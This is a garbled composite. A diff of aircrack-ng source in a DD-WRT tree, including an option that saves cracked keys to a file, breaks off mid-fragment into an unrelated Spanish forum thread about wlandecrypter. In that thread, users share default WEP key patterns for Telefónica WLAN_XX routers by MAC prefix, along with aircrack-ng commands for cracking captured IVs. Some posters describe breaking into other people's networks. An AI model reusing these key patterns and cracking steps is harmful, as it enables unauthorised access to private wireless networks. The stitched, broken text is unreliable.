memcpy(opt.f_smac, NULL_MAC, 6);
- opt.fast = 1;
-
- if( capture_ask_packet( &caplen, 0 ) != 0 )
- return( 1 );
+
+ if(opt.f_minlen_set == 0) {
+ opt.f_minlen = 80;
+ }
+ if(opt.f_maxlen_set == 0) {
+ opt.f_maxlen = 98;
+ }
+
+ while(1)
+ {
+ if( capture_ask_packet( &caplen, 0 ) != 0 )
+ return( 1 );
+ if( is_qos_arp_tkip(h80211, caplen) == 1 )
+ break;
+ }
memcpy(packet1, h80211, caplen);
@@ -4316,6 +4370,6 @@
PCT; printf("Got the answer!\n");
- PCT; printf("Waiting 5 seconds to let encrypted EAPOL frames pass without interfering.\n");
- read_sleep(5*1000000);
+ PCT; printf("Waiting 10 seconds to let encrypted EAPOL frames pass without interfering.\n");
+ read_sleep(10*1000000);
memcpy(h80211, packet1, packet1_len);
Index: /src/router/aircrack-ng/src/wesside-ng.c
===================================================================
--- /src/router/aircrack-ng/src/wesside-ng.c (revision 11606)
+++ /src/router/aircrack-ng/src/wesside-ng.c (revision 11928)
@@ -425,6 +425,6 @@
exit(1);
}
- if (rc != len) {
- time_print("Error Wrote %d out of %d\n", rc, len);
+ if (rc != len && rc != len + 3 /* packet length increases by 9 on Radiotap interfaces - this is normal */) {
+ time_print("ERROR: Packet length changed while transmitting (%d instead of %d).\n", rc, len);
exit(1);
}
Index: /src/router/aircrack-ng/src/airbase-ng.c
===================================================================
--- /src/router/aircrack-ng/src/airbase-ng.c (revision 11606)
+++ /src/router/aircrack-ng/src/airbase-ng.c (revision 11928)
@@ -536,4 +536,5 @@
FILE *f;
char ofn[1024];
+ struct pcap_file_header pfh;
if ( prefix == NULL) {
@@ -571,6 +572,4 @@
/* create the output packet capture file */
-
- struct pcap_file_header pfh;
snprintf( ofn, sizeof( ofn ) - 1, "%s-%02d.cap",
@@ -2515,9 +2514,10 @@
int gotsource, gotbssid;
int remaining, bytes2use;
- int reasso=0, fixed=0;
+ int reasso, fixed, z;
struct ST_info *st_cur = NULL;
struct ST_info *st_prv = NULL;
+ reasso = 0; fixed = 0;
bzero(essid, 256);
@@ -2526,6 +2526,4 @@
capture_packet(packet, length);
pthread_mutex_unlock( &mx_cap );
-
- int z;
z = ( ( packet[1] & 3 ) != 3 ) ? 24 : 30;
Index: /src/router/aircrack-ng/src/aireplay-ng.c
===================================================================
--- /src/router/aircrack-ng/src/aireplay-ng.c (revision 11606)
+++ /src/router/aircrack-ng/src/aireplay-ng.c (revision 11928)
@@ -5656,5 +5656,5 @@
opt.a_mode = -1; opt.r_fctrl = -1;
- opt.ghost = 0; opt.npackets = -1;
+ opt.ghost = 0;
opt.delay = 15; opt.bittest = 0;
opt.fast = 0; opt.r_smac_set = 0;
Index: /src/router/aircrack-ng/src/airdecap-ng.c
===================================================================
--- /src/router/aircrack-ng/src/airdecap-ng.c (revision 11606)
+++ /src/router/aircrack-ng/src/airdecap-ng.c (revision 11928)
@@ -162,5 +162,5 @@
pkh->caplen -= 24 + qosh_offset + 6;
- memcpy( buffer + 12, h80211 + 30, pkh->caplen );
+ memcpy( buffer + 12, h80211 + qosh_offset + 30, pkh->caplen );
}
else
@@ -169,5 +169,5 @@
pkh->caplen -= 30 + qosh_offset + 6;
- memcpy( buffer + 12, h80211 + 36, pkh->caplen );
+ memcpy( buffer + 12, h80211 + qosh_offset + 36, pkh->caplen );
}
Index: /src/router/aircrack-ng/src/sha1-sse2.h
===================================================================
--- /src/router/aircrack-ng/src/sha1-sse2.h (revision 11606)
+++ /src/router/aircrack-ng/src/sha1-sse2.h (revision 11928)
@@ -52,5 +52,19 @@
char key4[128] __attribute__ ((aligned (16)));
uchar pmks[128*4] __attribute__ ((aligned (16)));
-
+
+ // All in double size
+ uchar k_ipad[256] __attribute__ ((aligned (16)));
+ uchar ctx_ipad[80] __attribute__ ((aligned (16)));
+ uchar k_opad[256] __attribute__ ((aligned (16)));
+ uchar ctx_opad[80] __attribute__ ((aligned (16)));
+ uchar buffer[256] __attribute__ ((aligned (16)));
+ uchar sha1_ctx[80] __attribute__ ((aligned (16)));
+ uchar wrkbuf[1280] __attribute__ ((aligned (16)));
+ uint i, *u, *v, *w, *u3, *v4;
+ uchar *pmk1, *pmk2, *pmk3, *pmk4;
+
+ pmk1=pmks; pmk2=pmks+128; pmk3=pmks+128*2; pmk4=pmks+128*3;
+
+
strncpy(essid, _essid, 35);
strncpy(key1, _key1, 127);
@@ -59,16 +73,4 @@
strncpy(key4, _key4, 127);
- // todos estos doble tamaño
- uchar k_ipad[256] __attribute__ ((aligned (16)));
- uchar ctx_ipad[80] __attribute__ ((aligned (16)));
- uchar k_opad[256] __attribute__ ((aligned (16)));
- uchar ctx_opad[80] __attribute__ ((aligned (16)));
- uchar buffer[256] __attribute__ ((aligned (16)));
- uchar sha1_ctx[80] __attribute__ ((aligned (16)));
- uchar wrkbuf[1280] __attribute__ ((aligned (16)));
- uint i, *u, *v, *w, *u3, *v4;
- uchar *pmk1=pmks, *pmk2=pmks+128, *pmk3=pmks+128*2, *pmk4=pmks+128*3;
-
-
slen = strlen( essid ) + 4;
@@ -112,7 +114,7 @@
u = (uint *) ( k_opad );
- v = (uint *) ( k_opad + 64 );
+ v = (uint *) ( k_opad + 64 );
u3 = (uint *) ( k_opad + 128 );
- v4 = (uint *) ( k_opad + 192 );
+ v4 = (uint *) ( k_opad + 192 );
w = (uint *) buffer;
@@ -134,9 +136,9 @@
buffer[242] = buffer[246] = buffer[250] = buffer[254] = 0x02;
buffer[243] = buffer[247] = buffer[251] = buffer[255] = 0xA0;
-
-
+
+
essid[slen - 1] = '\1';
-
+
HMAC(EVP_sha1(), (uchar *)key1, strlen(key1), (uchar*)essid, slen, pmk1, NULL);
HMAC(EVP_sha1(), (uchar *)key2, strlen(key2), (uchar*)essid, slen, pmk2, NULL);
Index: /src/router/aircrack-ng/src/airserv-ng.c
===================================================================
--- /src/router/aircrack-ng/src/airserv-ng.c (revision 11606)
+++ /src/router/aircrack-ng/src/airserv-ng.c (revision 11928)
@@ -38,4 +38,6 @@
#ifdef __MACH__
#include <libkern/OSByteOrder.h>
+#elif defined(__FreeBSD__)
+#include <machine/endian.h>
#else
#include <asm/byteorder.h>
@@ -448,4 +450,14 @@
ri->ri_rate = OSSwapHostToBigInt32(ri->ri_rate);
ri->ri_antenna = OSSwapHostToBigInt32(ri->ri_antenna);
+
+#elif defined(__FreeBSD__)
+#if BYTE_ORDER == BIG_ENDIAN
+# define __be32_to_cpu(x) (x)
+# define __be64_to_cpu(x) (x)
+#elif BYTE_ORDER == LITTLE_ENDIAN
+# define __be32_to_cpu(x) __bswap32(x)
+# define __be64_to_cpu(x) __bswap64(x)
+#endif
+
#else
ri->ri_mactime = __cpu_to_be64(ri->ri_mactime);
Index: /src/router/aircrack-ng/src/aircrack-ng.c
===================================================================
--- /src/router/aircrack-ng/src/aircrack-ng.c (revision 11606)
+++ /src/router/aircrack-ng/src/aircrack-ng.c (revision 11928)
@@ -134,4 +134,5 @@
#define K17_IV 0x00100000
+/*
typedef struct
{
@@ -139,4 +140,5 @@
}used_iv;
used_iv* all_ivs;
+*/
typedef struct
@@ -193,4 +195,5 @@
" -q : enable quiet mode (no status output)\n"
" -C <macs> : merge the given APs to a virtual one\n"
+" -l <file> : write key to file\n"
"\n"
" Static WEP cracking options:\n"
@@ -2845,6 +2848,7 @@
static void key_found(unsigned char *wepkey, int keylen, int B)
{
+ FILE * keyFile;
+ int i, n;
int nb_ascii = 0;
- int i, n;
for( i = 0; i < keylen; i++ )
@@ -2896,4 +2900,15 @@
printf( "\n\tDecrypted correctly: %d%%\n", opt.probability );
printf( "\n" );
+
+ // Write the key to a file
+ if (opt.logKeyToFile != NULL) {
+ keyFile = fopen(opt.logKeyToFile, "w");
+ if (keyFile != NULL)
+ {
+ for( i = 0; i < keylen; i++ )
+ fprintf(keyFile, "%02X", wepkey);
+ fclose(keyFile);
+ }
+ }
}
@@ -3764,4 +3779,5 @@
int crack_wpa_thread( void *arg )
{
+ FILE * keyFile;
char essid[36];
char key[4][128];
@@ -3776,5 +3792,5 @@
int thread;
int ret=0;
- int i, j, len;
+ int i, j, len, slen;
int nparallel = 1;
@@ -3807,6 +3823,4 @@
}
- int slen;
-
/* receive the essid */
@@ -3906,4 +3920,14 @@
printf( "\33[32;22m" );
+ // Write the key to a file
+ if (opt.logKeyToFile != NULL) {
+ keyFile = fopen(opt.logKeyToFile, "w");
+ if (keyFile != NULL)
+ {
+ fprintf(keyFile, "%s", key[j]);
+ fclose(keyFile);
+ }
+ }
+
return SUCCESS;
}
@@ -3926,5 +3950,9 @@
}
-
+/**
+ * Open a specific dictionnary
+ * nb: index of the dictionnary
+ * return 0 on success and FAILURE if it failed
+ *nbsp; }
@@ -2697se(ke
-
mira no se que hacer mi wlan empieza 00:21:29... y este no aparece en ninguno de los wlandecrypter
mandame por privado o al correo que aparece cuando ejecutas wlandecrypter sin parametros
una captura con almenos 5 ivs
-
Hola dudux,
supongo que tu me podrás ayudar. La mac 00:80:5A no está en la lista de WLANDECRYPTER 1.1.
Parece ser un Conceptronic (TULIP COMPUTERS INTERNAT'L B.V.)
Como puedo conseguir un wordlist??
Gracias
-
Que yo recuerde telefónica nunca ha usado Conceptronic.
Seguro que es un WLAN_XX ???
-
Buenas, en primer lugar daros las felicitaciones por el trabajo que realizais.
Tengo un problema:
Tengo instalado wlandecrypter en wifislax 3.1(cd live), por supuesto cada vez que lo arranco lo vuelvo ha instalar xDDD.
Al grano, tengo una mac (00:1A:2B:xx:xx:xx) al poner en una shell :
wlandecrypter 00:1A:2B:XX:XX:XX WLAN_71 di.txt
Ejecuto el programa, y a final me sale [-] BSSID no encontrado
¿Por que es?
Gracias por vuestra atención,
Saludos
-
perdon por mi pregunta si es un poco torpe....he leido y buscado pero no hayo la solucion.
tengo wifiay en liveCD y me da errores de bssid no encontrado; quiero añadir esta version de wlandecrypter a un cd nuevo...pero no se en que rutas de las estructuras de carpetas debo añadir la version 1.1 para quemarla en un cd nuevo.
muchas gracias
-
buenas, fijate en el primer mensaje alli te pone como instalarlo, yo lo que hice en wifilax es copiar el wlandecry... en un pen, cargo el cd, pongo el pen, copio el wlandecrypter en una carpeta, ahora desde un terminal voy a esa carpeta (cd /home) o donde allas copiado el archivo.
Ahora pones lo siguiente:
tar zxvf wlandecrypter-1.1.tar.gz
cd wlandecrypter-1.1/
make clean && make && make install
Con esto machaca la versión antigua y te instala la 1.1.
Espero que te sirva.
Adios
-
Hola.
Abres la imagen del wifiway, con ultraiso por ejemplo, en la carpeta nombrada wifiway hallaras otra llamada modules, pues en esta carpeta metes los módulos de las aplicaciones que quieras usar, guardas el proyecto poniéndole el nombre que quieras, grabas esa nueva imagen creada en un CD, y al arrancar el livcd ya carga esos módulos, también lo puedes hacer en el usb, simplemente metes los módulos en la carpeta modules y listo, en el enlace hallaras varios módulos ademas del que buscas.
http://www.4shared.com/dir/18689679/d602ebef/modules.html
Salu2 y suerte
-
muchas gracias, pero....¿hace falta el ultraiso? ¿no puedo copiar el sistema de archivos de carpetas del cd...en una carpeta del disco duro...añadir los modulos y volver a quemar el cd? ???
-
Hola.
Pues no lo se, yo siempre uso el ultraiso, y como no he probado, no digo ni si, ni no ^-^
Salu2 y suerte
-
a ver si puedo y saco la version 1.2 con otro bssid nuevo..........alguien tiene alguna otra cabecera que no aparezca con la 1.1?
Post Merge: 12-11-2009, 22:54 (Jueves)
00:03:DA:XX:XX:XX
00:1F:9F::XX:XX:XX
wlandecrypter 1.2 - 2007-2008-2009 dudu[at]seguridadwireless.net
2006 nilp0inter2k6_at_gmail.com
----------> http://www.seguridadwireless.net <----------
uso: wlandecrypter <bssid> <essid> [output file]
*Essid:
WLAN_?? : Para crear diccionario con todas las posibilidades.
[+] BSSID: 00:1F:9F:EE:EE:EE
[+] Modelo: ????????_2009
[+] ESSID: WLAN_9C
[+] Fichero de claves: 9c
[+] Fichero guardado
-
Hola a todos.
Si, yo tengo la cabecera E0:91:53, un Xavi, sospecho que un 7968r o algo asi, pero no puedo confirmarlo, ¿alguien puede?
El formato de las claves para una WLAN_?? es de la forma XE09153xxxx??
He modificado wlandecrypter v1.1 añadiendo esta cabecera y he eliminado la constante MAXINDEX (y lo relacionado con ella) del código. La MAXINDEX la encuentro innecesaria, a menos que se me escape algo de su razón de ser ¿..?, y todo funciona OK.
Si queréis puedo publicar el código con los cambios marcados.
Por cierto, no sé si estará ya puesto en algún lugar del foro, pero en
http://anonsvn.wireshark.org/wireshark/trunk/manuf
hay un gran listado de cabeceras mac con el nombre de sus fabricantes (Ethernet vendor codes).
Un saludo.
-
Hola a todos.
Si, yo tengo la cabecera E0:91:53, un Xavi, sospecho que un 7968r o algo asi, pero no puedo confirmarlo, ¿alguien puede?
El formato de las claves para una WLAN_?? es de la forma XE09153xxxx??
He modificado wlandecrypter v1.1 añadiendo esta cabecera y he eliminado la constante MAXINDEX (y lo relacionado con ella) del código. La MAXINDEX la encuentro innecesaria, a menos que se me escape algo de su razón de ser ¿..?, y todo funciona OK.
Si queréis puedo publicar el código con los cambios marcados.
Por cierto, no sé si estará ya puesto en algún lugar del foro, pero en
http://anonsvn.wireshark.org/wireshark/trunk/manuf
hay un gran listado de cabeceras mac con el nombre de sus fabricantes (Ethernet vendor codes).
Un saludo.
mandame una captura con algun paquete.......hay 2 cabeceras mas para incluir
la constante PUEDE SER que no se gaste.......el codigo es reciclado!
-
Joeer como camina la cosa... >:( >:( >:( >:( >:( >:(
tengo un router Senao/Engenius 2610 con una version de firm modficada de Fon 2100/2200 con suite aircrack-ng incliuda..
El wlandecrypter para fon, como se instala eso??
lo he puesto en tmp/root/ porq no hay espacio para jffs
login as: root
DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
Release: 01/17/09 (SVN revision: 11456)
root@192.168.1.1's password:
==========================================================
.___. DD-WRT With AutoAP
/ \ CONTROL@http://ROUTER/user/cgi-bin/autoap.cgi
| O _ O |
/ \_/ \ LOGS@http://ROUTER/user/autoap.htm
.' / \ `.
/ _| |_ \
(_/ | | \_) http://www.fonerahacks.com
\ /
__\_>-<_/__
~;/ \;~ DD-WRT v24-sp2
http://www.dd-wrt.com
==========================================================
BusyBox v1.13.2 (2009-01-17 05:59:58 CET) built-in shell (ash)
Enter 'help' for a list of built-in commands.
root@DD-WRT:~# ls
replay_arp-0101-190122.cap wlandecrypter
root@DD-WRT:~# ./wlandecrypter
-sh: ./wlandecrypter: Permission denied
root@DD-WRT:~# chmod 777 wlandecrypter
root@DD-WRT:~# ./wlandecrypter
Segmentation fault
root@DD-WRT:~# ./wlandecrypter
Segmentation fault
root@DD-WRT:~# sh wlandecrypter
wlandecrypter: line 1: syntax error: "(" unexpected
root@DD-WRT:~#
-
ese router es mips?? y en caso que lo sea sabes si es compatible con los ejecutables de la fonera (es decir si ambos son little endian o son big endian)?
-
berni es como el mio
si es totalmente compatible con aplicaciones fonera
o al menos tu aircrack a falta de probar todo se andara
por cierto sabias que dd wrt ya incluye aircrack en sus ultimas versiones
o sea no hace falta ni espacio ni instalarlo otra cosa es capturar
saludos
-
Hago un par de propuestas, 2 opciones que añadir a WlanDecrypter, que yo tengo ya implementadas para mi.
1ª: opción "-l" que muestra en pantalla la lista completa de los routers conocidos incluidos en wlandecrypter. Para cuando se encuentran con el mensaje "[-] BSSID no encontrado".
2ª: opción "-e", digamos experimental, que crea un diccionario para un router desconocido, no incluido en wlandecrypter, que nos podamos encontrar y sirva para probar suerte. Ya que en algunos de los últimos routers las claves siguen el patrón X112233xxxxAB, por ejemplo un router Xavi con mac 11:22:33:xx:xx:xx y WLAN_AB, e igual en algunos Comtrend, Zyxel, etc, porque no probar y ver que pasa con otros que puedan aparecer y no estén aun en la lista. Asi me pasó con el Xavi E0:91:53 ;).
uso: wlandecrypter [-l] <bssid> <essid> [output file -e]
-l: lista en pantalla los routers conocidos.
-e: genera diccionario experimental para routers desconocidos.
*Essid:
WLAN_?? : Para crear diccionario con todas las posibilidades.
Ejemplo: wlandecrypter 00:11:22:33:44:55 wlan_aa prueba -e
Genera diccionario "prueba" con C0011220000AA hasta C001122FFFFAA, X0011220000AA a X001122FFFFAA y Z0011220000AA hasta Z001122FFFFAA
Byez.
-
ok,en la proxima version iram todas esas funcionalidades,no te preocupes y gracias por el consejo
dejarme que estoy de parciales y toy estudiando........en breves lo cuelgo para linux y berni lo coolgara para windows
de todas formas puedes enviarme sugerencias al correo que aparece en la ayuda o readme
asi mandamelo alli porfavor,asi no me olvidare
-
Buenas:
¿Existe el módulo lzm para actualizar el wlandecrypter del live/cd de wifiway 1.0?
Salu2.
-
:-[ Lo siento soy nueva en esto, he intentado hacer el diccionario y me dice BSSID no encontrado, sé que tengo que actualizar el diccionario, pero no se como hacerlo, uso wifislax 3.1, y chipset es zd1211rw, me podeis ayudar???
-
En primer lugar, presentarme y felicitar a quienes realizan esta magnifica labor.
La versión 1.1 me sacó de algunas dudas, pero otras, persisten.
A propósito de [-] BSSID no encontrado:
Con una WLAN_AC MAC 00:18:02 xx xx xx
Manufactura 00:18:02 AlphaNetwo # Alpha Networks Inc.
¿No es un router raro para una WLAN_xx?
Si no hay alguna sugerencia, esperaremos pacientemente la versión 1.2
Saludos. ;)
-
Las claves que genera wlandecryter siguen un patrón, un formato determinado, y están relacionadas con la mac del router, ese BSSID que comentáis. Por eso wlandecrypter necesita saber la BSSID y así generar las claves posibles para ese modelo de router concreto. Si le pasamos una BSSID que no conoce no sabe que claves generar y por eso da el mensaje de error "[-] BSSID no encontrado".
Puede haber personas que tengan un router que no sea el que su operador le dió, comprado por ellos por ejemplo, pero que lo hayan configurado con la misma clave y ESSID que tenía el original. Al ser de otro fabricante wlandecrypter no lo reconoce.
Para estos casos quizá sería interesante tener una opción que generase un diccionario genérico para todos los routers conocidos y una ESSID determinada que le pasemos, claro que con esto tendríamos un diccionario de unos 19 megas para los 21 tipos de claves que puede que tenga la versión 1.2. Creo que voy a implementarla, sería un complemento a la opción '-e' que comenté hace unos días.
P.D: Los routers que wlandecrypter reconoce son Zyxel, Comtrend, Z-com, Xavi, Zygate.
Byez.
-
Hago un par de propuestas, 2 opciones que añadir a WlanDecrypter, que yo tengo ya implementadas para mi.
1ª: opción "-l" que muestra en pantalla la lista completa de los routers conocidos incluidos en wlandecrypter. Para cuando se encuentran con el mensaje "[-] BSSID no encontrado".
2ª: opción "-e", digamos experimental, que crea un diccionario para un router desconocido, no incluido en wlandecrypter, que nos podamos encontrar y sirva para probar suerte. Ya que en algunos de los últimos routers las claves siguen el patrón X112233xxxxAB, por ejemplo un router Xavi con mac 11:22:33:xx:xx:xx y WLAN_AB, e igual en algunos Comtrend, Zyxel, etc, porque no probar y ver que pasa con otros que puedan aparecer y no estén aun en la lista. Asi me pasó con el Xavi E0:91:53 ;).
uso: wlandecrypter [-l] <bssid> <essid> [output file -e]
-l: lista en pantalla los routers conocidos.
-e: genera diccionario experimental para routers desconocidos.
*Essid:
WLAN_?? : Para crear diccionario con todas las posibilidades.
Ejemplo: wlandecrypter 00:11:22:33:44:55 wlan_aa prueba -e
Genera diccionario "prueba" con C0011220000AA hasta C001122FFFFAA, X0011220000AA a X001122FFFFAA y Z0011220000AA hasta Z001122FFFFAA
Byez.
Buenas, jugando jugando me he encontrado con un wlan_AA E0:91:53:xx:xx:xx y no consigo nada
he generado diccionarios CE09153xxxxAA , ZE09153xxxxAA, XE09153xxxxAA y nada de nada
ahora ya estoy picado porque hacia tiempo que no se me resistía una
(he usado wlandecrypter 1.1 aircrack-ng aircrack-ptw ... etc)
Alguna solucion?
EDITO SOLUCIONADO: He generado mal el diccionario ya que he hecho desde el 0000 hasta el 9999 y no hasta FFFF, una vez generado .... WLAN_AA E0:91:53:xx:xx:xx es del tipo XE09153xxxxAA
-
OK, así junto con la mía que era XE09153xxxxDF, vamos confirmando la regla :D
-
OK, así junto con la mía que era XE09153xxxxDF, vamos confirmando la regla :D
si esa cabecera es esa.........mañana subire la version 1.2 con 3 cabeceras mas
pero dado mi falta de tiempo,no implementare esas opciones ¡hasta que acabe examenes,
por cierto niroz,pasame el codigo y cuando puedas
-
OK, así junto con la mía que era XE09153xxxxDF, vamos confirmando la regla :D
si esa cabecera es esa.........mañana subire la version 1.2 con 3 cabeceras mas
pero dado mi falta de tiempo,no implementare esas opciones ¡hasta que acabe examenes,
por cierto niroz,pasame el codigo y cuando puedas
Como no. Pasaré el código y/o lo publicaré. No vamos a estar reinventado la rueda. Y habrá que devolver algo a la comunidad... o.O
P.D.: Ya sé. La mac E0:91:53:xx:xx:xx es de un Xavi 7968, Model Number Solos 4610 RD / Solos 461x CSP v1.0, (y siguen manteniendo el 1234:1234)
Byez.
-
OK, así junto con la mía que era XE09153xxxxDF, vamos confirmando la regla :D
si esa cabecera es esa.........mañana subire la version 1.2 con 3 cabeceras mas
pero dado mi falta de tiempo,no implementare esas opciones ¡hasta que acabe examenes,
por cierto niroz,pasame el codigo y cuando puedas
Como no. Pasaré el código y/o lo publicaré. No vamos a estar reinventado la rueda. Y habrá que devolver algo a la comunidad... o.O
P.D.: Ya sé. La mac E0:91:53:xx:xx:xx es de un Xavi 7968, Model Number Solos 4610 RD / Solos 461x CSP v1.0, (y siguen manteniendo el 1234:1234)
Byez.
En el mio no tiene 1234:1234 de momento desconozco si ha sido cambiado
saludos
PD: Puse WLAN_AA por poner algo AA no es la real, si es necesaria para su implementación lo pongo o lo paso por privado
-
P.D.: Ya sé. La mac E0:91:53:xx:xx:xx es de un Xavi 7968, Model Number Solos 4610 RD / Solos 461x CSP v1.0, (y siguen manteniendo el 1234:1234)
Byez.
En el mio no tiene 1234:1234 de momento desconozco si ha sido cambiado
saludos
PD: Puse WLAN_AA por poner algo AA no es la real, si es necesaria para su implementación lo pongo o lo paso por privado
No es necesario, gracias.
-
Pues acabo de encontrame con otra nuevecita que sigue el mismo patrón, y que lógicamente, wlandecryter no reconoce.
00:18:02 xx xx xx WLAN_Ex
Investigaré lo que pueda.
-
mandame una captura con 5 paquetes al corrreo que aparece en el wlandecrypter........me espero a que consigas la cabecera y sacamos la 1.2 completita
-
Ya está hecho. ;)
https://foro.seguridadwireless.net/noticias-wireless/clave-por-defecto-wpa-psk-de-las-redes-wireless-wlan_xxxx-y-jazztel_xxxx/
-
Bueno os dejo el wlandecrypter con las opciones que comenté hace unos post y la nueva '-a'.
uso: wlandecrypter [-l] <bssid> <essid> [output_file opciOn]
-l: lista en pantalla los routers conocidos.
opciOn:
-e: genera diccionario experimental para routers desconocidos.
-a: genera diccionario para todos los routers conocidos y una WLAN_XX.
<essid> = WLAN_??, para crear diccionario con todas las posibilidades, de 00 a FF.
Echadle un vistazo al README.txt. Ya me diréis lo que falle.
Descarga wlandecrypter_v1.2b-> http://www.box.net/shared/1t9nqygf4r
Nota: Veo que se sigue descargando esta versión, no importa, pero la v1.2 final completa esta disponible desde hace ya tiempo, https://foro.seguridadwireless.net/enlaces-descarga-aplicaciones-wireless-linux/wlandecrypter-0-6-nuevas-macs/msg150204/#msg150204
P.D.: Se puede compilar en tanto en Linux, Win y Mac. Puedo poner ya compilado el binario para Mac.
P.P.D.: Un diccionario con la opción -a y wlan_?? ocupará unos 4,2GB de disco duro, ¿realmente necesitas eso?. Con la opción -e y wlan_?? el diccionario será de unos 670 MB.
-
lo meto en la version 1.2?¿
me falta sacar una cabecera
-
lo meto en la version 1.2?¿
me falta sacar una cabecera
Claro, es mi contribución para la versión 1.2, de hecho yo esta la he llamado 1.2b.
-
Yo con HEXTREME 2.0 he buscado la cadena en HEX E09153 en este caso la MAC sigue de 0228C4 y es WLAN_BB, con HEXTREME encontré unas cadenas diferentes E091530186BB, la he probado y perfecto.
-
lo meto en la version 1.2?¿
me falta sacar una cabecera
Claro, es mi contribución para la versión 1.2, de hecho yo esta la he llamado 1.2b.
quieres mantenerlo tu?
-
lo meto en la version 1.2?¿
me falta sacar una cabecera
Claro, es mi contribución para la versión 1.2, de hecho yo esta la he llamado 1.2b.
quieres mantenerlo tu?
De acuerdo puedo ayudar a mantenerlo, aunque espero que con tu ayuda que ya llevas bastante tiempo con ello.
Pásame el resto de cabeceras a incluir y si no se encuentran fallos que corregir en el código fuente que ya publiqué como wlandecrypter 1.2b, las añado y así que pase a ser el 1.2 definitivo.
Saludos.
-
lo meto en la version 1.2?¿
me falta sacar una cabecera
Claro, es mi contribución para la versión 1.2, de hecho yo esta la he llamado 1.2b.
quieres mantenerlo tu?
De acuerdo puedo ayudar a mantenerlo, aunque espero que con tu ayuda que ya llevas bastante tiempo con ello.
Pásame el resto de cabeceras a incluir y si no se encuentran fallos que corregir las incluyo en el código que ya puse como wlandecrypter 1.2b y así que pase a ser el 1.2 definitivo.
Saludos.
Esta hecho ;),cuando vuelva de clase te paso toda la info,tengo 3 cabeceras mas
Venga campeon,nos vemos ;D
-
Hi all,
estamos a punto de subir wlandecrypter v1.2 con las opciones descritas y 4 nuevas cabeceras. Si alguien tiene info sobre routers con mac 00:18:02:xx:xx:xx, Huawei EchoLife HG520v, nos vendrá bien.
-
Hola, vereis estoy empezando a usar el WLANdecrypter y no se si intento algo imposible.
estuve intentando demostrar a un amigo lo insegura qe era su wifi, es de telefonica y tiene el router tal cual se lo mandaron. el caso es que con 19.000 ivs no lo logre abrir con el aircrack a pelo, cosa que normalmente logro. y el otro dia se me ocurrio crear un diccionario con el wlandecrypter y aplicarlo sobre esos 19.000 ivs que tengo y sigue sin salir la clave. es normal? es imposible lo que intento? hay que hacerlo insitu?
un saludo y gracias, vuestra contribucion a la sociedad es impagable!!! ;D
-
Buenas:
con el wlandecrypter y aplicarlo sobre esos 19.000 ivs que tengo y sigue sin salir la clave. es normal?
Puede ser que no tengas actualizado el wlandecrypter con las ultimas mac. Si tu mac está dentro del wlandecrypter con 4 ivs te dará la clave en dos segundos.
Un saludo.
-
es la 1.1 y la mac supuestamente esta en el wlandecrypter desde la 0.6.
he estado probado ahora y se me ha ocurrido qe alomejor no estoy haciendolo bien.
los ivs los he guardado en la carpeta /sergio/ y el diccionario lo he llamado diccionarioE3.txt, el wlandecrypter me ha dicho qe esta bien guardado y todo eso
a continuacion he introducido
aircrack-ng -b 00:11:22:33:44:55 -w diccionario00.txt -K captura.cap
esto me daba un error, asi que cambie el -K por -0 (es la opcion qe uso siempre)
qedando
aircrack-ng -b 00:11:22:33:44:55 -w diccionario00.txt -0 /sergio/*.ivs
estoy seguro de que esta mal el comendo, pero como debo ponerlo?
un saludo
-
Buenas;
Pues seguro que haces algo mal. Si al diccionario que creaste con wlandecrypter lo llamaste "diccionarioE3.txt" por que al aircrack-ng le dices que se llama "diccionario00.txt".
Es muy sencillo. Te vas a la carpeta donde tienes los ivis le das a la tecla F4 y te va a salir una shell. Hay lanza el wlandecrypter con la mac, el essid y el nombre al diccionario que tu quieras poner por ejemplo prueba. Veras que te crea un diccionario en esa misma carpeta que se llama prueba.
Despues en la shell pones aircrack-ng "nombre archivo-01.cap" donde tienes los ivis " -w prueba" y veras como te da la clave en cuestión de segundos. Esto te lo digo de memoria espero no haberme equivocado y si no está bien que alguien me rectifique.
Saludos.
-
Perdon, me equivoque, el diccionario lo pongo bien, pongo diccionarioE3.txt siempre.
el problema ya me doy cuenta de cual es, no tengo un archivo .cap tengo unos 35 archivos .ivs, como le indico que aplique ese diccionario sobre esos archivos?
un saludo
-
Perdon, me equivoque, el diccionario lo pongo bien, pongo diccionarioE3.txt siempre.
el problema ya me doy cuenta de cual es, no tengo un archivo .cap tengo unos 35 archivos .ivs, como le indico que aplique ese diccionario sobre esos archivos?
un saludo
Como has capturado esos 35 archivos .ivs? Con airodump? o tienen algún otro formato.
Te podría bastar con poner: aircrack-ng *.ivs -w diccionarioE3.txt
Yo suelo hacer: aircrack-ng *.cap -w dicci
Si hay varias redes en el o los cap que tengas, aircrack te muestra una lista y tu escoges la que quieras.
Pon los ficheros de capturas y el del diccionario en el mismo directorio.
19.000 iv's pueden no ser suficientes para obtener la clave wep sin diccionario.
-
Habran pasado a WPA?me he encontrado esto hoy,.......
00:1D:20:Fx:xx:xD WLAN_1E2A WPA
-
Habran pasado a WPA?me he encontrado esto hoy,.......
00:1D:20:Fx:xx:xD WLAN_1E2A WPA
Hace tiempo algo decían por ahí sobre que iban a mejorar la seguridad y pasar a wpa...
-
ya, ya se que pueden no ser suficientes, de echo no sale. :D
luego pruebo lo que me as dicho a ver si de esa forma la saca.
puede ser que empiecen a ponerlos con WPA pero sinceramente lo dudo, no creo qe se tomen la molestia de hacer eso ni por asomo. si que es posible que alguien haya cambiado la clave pero no el nombre de la red...
un saludo
-
Habran pasado a WPA?me he encontrado esto hoy,.......
00:1D:20:Fx:xx:xD WLAN_1E2A WPA
y esa es de timofonica?
-
ya, ya se que pueden no ser suficientes, de echo no sale. :D
luego pruebo lo que me as dicho a ver si de esa forma la saca.
puede ser que empiecen a ponerlos con WPA pero sinceramente lo dudo, no creo qe se tomen la molestia de hacer eso ni por asomo. si que es posible que alguien haya cambiado la clave pero no el nombre de la red...
un saludo
la verdad que deberias de pensar amigo Jueves que a mas seguridad en las redes inalambricas menos posibilidad de pincha redes y por lo tanto mas necesidad de contratar ademas de gastar menos ancho de banda
y en otras cosas timofonica no espabila pero en ver como aumentar beneficios te aseguro que si
en un par de semanas maximo saldremos de dudas
saludos
-
confirmado. telefonica esta instalando dos modelos de router con WPA-psk activado.
la implementacion va a ser bastante rapida con el comtrend 5635 y un zyxel.
El Comtrend usa wpa de 20 digitos alfanumericos en minusculas
El Zyxel usa wpa de 20 digitos alfanumericos en MAYUSCULAS
El SSID es del estilo: wlan_xxxx
Tambien podria darse el caso de un modelo facilitado por Observa telecom con un punto en posición aleatoria. Pero este ultimo no lo he podido confirmar.
